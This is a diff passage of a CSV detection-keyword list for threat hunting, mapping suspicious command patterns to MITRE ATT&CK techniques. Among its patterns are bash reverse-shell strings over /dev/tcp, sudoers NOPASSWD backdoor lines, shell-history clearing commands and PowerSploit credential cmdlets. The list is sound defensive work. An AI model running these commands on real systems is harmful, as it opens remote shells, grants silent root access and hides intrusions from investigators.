Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*echo * .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*echo * /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*echo * /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*echo *%sudo ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" @@ -467,19 +467,19 @@ "*ejkaocphofnobjdedneohbbiilggdlbi*","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*elastic-agent.exe uninstall*","greyware_tool_keyword","elastic-agent","uninstall elast-agent from the system","T1562.004 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A" "*eppiocemhmnlbhjplcgkofciiegomcon*","greyware_tool_keyword","Urban Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*error in libcrypto*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*export HISTFILE=/dev/null*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*export HISTFILESIZE=0*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*export HISTFILESIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*export HISTSIZE=0*","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*external-nse-script-library*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" -"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*fcfhplploccackoneaefokcmbjfbkenj*","greyware_tool_keyword","1clickVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*fdcgdnkidjaadafnichfpabhfomcebme*","greyware_tool_keyword","ZenMate VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*ffbkglfijbcbgblgflchnbphjdllaogb*","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ffhhkmlgedgcliajaedapkdfigdobcif*","greyware_tool_keyword","Nucleus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*fgddmllnllkalaagkghckoinaemmogpe*","greyware_tool_keyword","ExpressVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" @@ -532,20 +532,20 @@ "*getent passwd | cut -d: -f1*","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-LoggedonLocal -ComputerName *","greyware_tool_keyword","powershell","PowerView get Locally logged users on a machine","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-MpComputerStatus*","greyware_tool_keyword","powershell","Gets the status of antimalware software on the computer.","T1063","TA0005 - TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestCatalog*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestTrust*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetGroupMember -GroupName *DNSAdmins*","greyware_tool_keyword","powershell","the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or lateral movement within the network.","T1069.001","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSession*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetShare*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetSubnet*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetUser -SPN*","greyware_tool_keyword","powershell","PowerView Find users with SPN","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ggackgngljinccllcmbgnpgpllcjepgc*","greyware_tool_keyword","WindmillVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*gjknjjomckknofjidppipffbpoekiipm*","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*gkojfkhlekighikafcpjkiklfbnlmeio*","greyware_tool_keyword","Hola Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" @@ -555,7 +555,7 @@ "*GoodSync Server*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","Service Name","9","10","N/A","N/A","N/A","N/A" "*GoodSync-vsub-2Go-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","portable version","9","10","N/A","N/A","N/A","N/A" "*gpg --list-keys*","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","4","8","N/A","N/A","N/A","N/A" -"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 